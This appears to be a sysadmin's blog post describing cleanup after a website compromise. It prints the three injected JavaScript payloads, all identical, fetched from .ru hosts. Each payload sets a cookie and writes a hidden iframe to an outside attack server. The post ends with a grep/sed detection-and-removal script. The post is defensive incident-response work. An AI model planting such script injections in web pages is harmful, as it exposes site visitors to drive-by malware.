Malware Attack, Part 2

As I mentioned in yesterday's blog, the server was under Malware attack again. This time I realised that 700+ HTML files got the embedded "<script>...</script>" script reference. Worse, the pattern repeated 3-4 times on the same line with different script references. Also, I realised that the owner of the files have been changed to 'root' instead of the real owner.

I found 3 unique script references and they all used the same IFRAME approach to plant the attack

$ curl http://www.porv.ru/js.js
window.status="";
n=navigator.userLanguage.toUpperCase();
if((n!="ZH-CN")&&(n!="ZH-MO")&&(n!="ZH-HK")&&(n!="BN")&&(n!="GU")&&(n!="NE")&&(n
!="PA")&&(n!="ID")&&(n!="EN-PH")&&(n!="UR")&&(n!="RU")&&(n!="KO")&&(n!="ZH-TW")&
&(n!="ZH")&&(n!="HI")&&(n!="TH")&&(n!="VI")){
var cookieString = document.cookie;
var start = cookieString.indexOf("v1goo=");
if (start != -1){}else{
var expires = new Date();
expires.setTime(expires.getTime()+9*3600*1000);
document.cookie = "v1goo=update;expires="+expires.toGMTString();
try{
document.write("<iframe src=http://ibse.ru/cgi-bin/index.cgi?ad width=0 height=0
 frameborder=0></iframe>");
}
catch(e)
{
};
}}

$ curl http://www.8hcs.ru/js.js
window.status="";
n=navigator.userLanguage.toUpperCase();
if((n!="ZH-CN")&&(n!="ZH-MO")&&(n!="ZH-HK")&&(n!="BN")&&(n!="GU")&&(n!="NE")&&(n
!="PA")&&(n!="ID")&&(n!="EN-PH")&&(n!="UR")&&(n!="RU")&&(n!="KO")&&(n!="ZH-TW")&
&(n!="ZH")&&(n!="HI")&&(n!="TH")&&(n!="VI")){
var cookieString = document.cookie;
var start = cookieString.indexOf("v1goo=");
if (start != -1){}else{
var expires = new Date();
expires.setTime(expires.getTime()+9*3600*1000);
document.cookie = "v1goo=update;expires="+expires.toGMTString();
try{
document.write("<iframe src=http://ibse.ru/cgi-bin/index.cgi?ad width=0 height=0
 frameborder=0></iframe>");
}
catch(e)
{
};
}}
$ curl http://www.uhwc.ru/js.js
window.status="";
n=navigator.userLanguage.toUpperCase();
if((n!="ZH-CN")&&(n!="ZH-MO")&&(n!="ZH-HK")&&(n!="BN")&&(n!="GU")&&(n!="NE")&&(n
!="PA")&&(n!="ID")&&(n!="EN-PH")&&(n!="UR")&&(n!="RU")&&(n!="KO")&&(n!="ZH-TW")&
&(n!="ZH")&&(n!="HI")&&(n!="TH")&&(n!="VI")){
var cookieString = document.cookie;
var start = cookieString.indexOf("v1goo=");
if (start != -1){}else{
var expires = new Date();
expires.setTime(expires.getTime()+9*3600*1000);
document.cookie = "v1goo=update;expires="+expires.toGMTString();
try{
document.write("<iframe src=http://ibse.ru/cgi-bin/index.cgi?ad width=0 height=0
 frameborder=0></iframe>");
}
catch(e)
{
};
}}

I also modified my previous script to match the script reference based on regular expression in my grep and sed. I need to ensure the substitution is done globally (ie, "g" modifier) in sed. BTW, the "-i" flag did not work with extended regular expression in sed and therefore I have to go through a temp file. Here is the modified script:

#! /bin/sh

TMPFILE=".tmp-$$"
for i in `find . -type f \( -name "*.html" -o -name "*.htm" \)`
do
        grep -E '<script src=http://\w+\.(\w+\.)+\w+/.+\.js></script>' "$i" > /dev/null 2>&1
        if [ $? -eq 0 ]; then
                echo -e "Removing malware in $i ... \c"
                sed -r -e 's#<script src=http://\w+\.(\w+\.)+\w+/.+\.js></script>##g' "$i" > $TMPFILE
                grep -E '<script src=http://\w+\.(\w+\.)+\w+/.+\.js></script>' $TMPFILE > /dev/null 2>&1
                if [ $? -eq 0 ]; then
                        echo "*** NOT OK ***"
                else
                        mv $TMPFILE "$i"
                        echo "Ok."
                fi
        fi
done